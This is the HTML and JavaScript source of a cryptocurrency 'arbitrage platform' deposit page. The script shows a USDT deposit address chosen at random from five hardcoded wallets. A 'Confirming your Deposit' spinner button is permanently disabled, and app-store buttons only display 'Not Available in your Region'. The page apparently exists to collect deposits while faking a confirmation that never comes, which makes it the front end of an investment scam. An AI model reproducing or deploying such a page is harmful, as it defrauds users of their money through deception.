<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/bootstrap.css">
    <script src="js/bootstrap.bundle.js"></script>
    <script src="https://unpkg.com/@lottiefiles/lottie-player@latest/dist/lottie-player.js"></script>
    <link rel="shortcut icon" href="img/logo2.png" type="image/x-icon">
    <title>Best CryptoArbitrage Platform</title>
</head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Mukta:wght@200;300;400;500;600;700;800&display=swap');
*{
    font-family:Mukta ;
    color: white;
}
html, body{
    overflow-x: hidden;
}
img{
    pointer-events: none;
}
.aler{
    position: fixed;
    top: 50px;
    right: 40px;
    color: #000;
    z-index: 10;   
    animation: alerter 2s linear;
    display: none;
}
@keyframes alerter {
    0%{
        opacity: 1;
    }
    70%{
        opacity: 1;
    }
    100%{
        opacity: 0;
    }
}

#buy,#sell{
    animation: show 2s linear;

}
@keyframes show {
    0%{
        opacity: 0;
    }
    100%{
        opacity: 1;
    }
}

</style>
<body style="background-color: black;">

<p class="small p-3 rounded pill aler shadow-lg" id="alert" style="background-color: #10D078;"> Not Available in your Region</p>
     
  <div class="container p-5 p-lg-4">
    <img src="img/logonew.png" alt="" style="max-width: 30vw; width: 43%;">
  </div>  

  
<div class="container p-4 py-3 col-lg-4 mx-auto">


<form action="" class="p-3 bg-white rounded mt-2">
<p class="lead text-secondary">Deposit USDT (TRC 20)</p>
<img src="/img/scan.png" class="img-fluid w-50 d-block mx-auto" alt="">
<p class="text-secondary text-center" style="font-size: 8pt; font-style: italic ;">Scan QR Code To Deposit</p>

<p class="small text-secondary m-0 p-0" >Your Deposit Address (USDT TRC 20):</p>
<p class="small text-black m-0 p-0" id="wallet"></p>
<br><br>
<p class="small text-secondary p-0 m-0">Send Exactly: <strong id="sendamount" class="text-secondary"></strong></p>
<p class="small text-secondary">You Receive: <strong id="receiveamount" class="text-secondary"></strong></p>
<button disabled class="btn w-100 mt-2 border-0 py-3" style="background-color: #10D078; color: #000;"><span class="spinner spinner-border text-black  " style="width: 18px; height: 18px;"></span> &nbsp; Confirming your Deposit</button>  
<br><br>
<p class="small text-secondary">NB: Your Asset will be transferred automatically after 20 Blockchain Confirmations.</p>
</form>
</div>



<br><br>
<br>


<footer class="px-4">
    <form action="" class="col-xl-5 d-block mx-auto p-3">
        <p class="lead ">Subscribe to Our Newsletter</p>
      <input required type="email" placeholder="example@gmail.com" class="form-control shadow-none border-0 bg-dark outline-none shadow-0 text-white">
    <button class="btn w-100 mt-2" style="background-color: #10D078; color: #000;">Subscribe</button>  



    </form>
    

    <div class="row mt-5 mb-2">
        <div class="col" onclick="Messade()">
            <img src="img/gplay-.svg" id="gp"  class="img-fluid d-block ms-auto" alt="">
        </div>
        <div class="col" onclick="Messade()">
            <img src="img/appstore-.svg"  id="ap" class="img-fluid" alt="">
        </div>
    </div>
</footer>
<br>
<script>

if(localStorage.getItem('Details') == null){
    window.location = 'index.html';
}

var Details = JSON.parse(localStorage.getItem('Details'));

console.log(JSON.parse(localStorage.getItem('Details')))
var Wallets = ['TYVXzrz6Z1uT9s2oohRCasnXdGq42tNQxG','THr5EVyoKXFwNu5V5KXbrCMLVJHjJ57mU4','TY9jnqyX26wQLvMdKEKKVR6mhf3CARocMA','TGaCUS7wjV52bU8DEXiL42CZ4ssJc4Yf9s','TVEkT7tqDGXDuT1yYqXKYKfsjX6ggyyPw8'];
document.getElementById('wallet').innerText  = Wallets[Math.floor(Math.random() * 5)]
document.getElementById('sendamount').innerText = Details.Amount + ' USDT (TRC 20)';
document.getElementById('receiveamount').innerText = Details.Receive + ' ' + Details.Coin ;

function Messade (){
        document.getElementById('alert').style.display = 'block';
        var Rem = setTimeout(RemoveMessage,2000);
    }
    function RemoveMessage(){
        document.getElementById('alert').style.display = 'none';
    }
</script>
</body>
</html>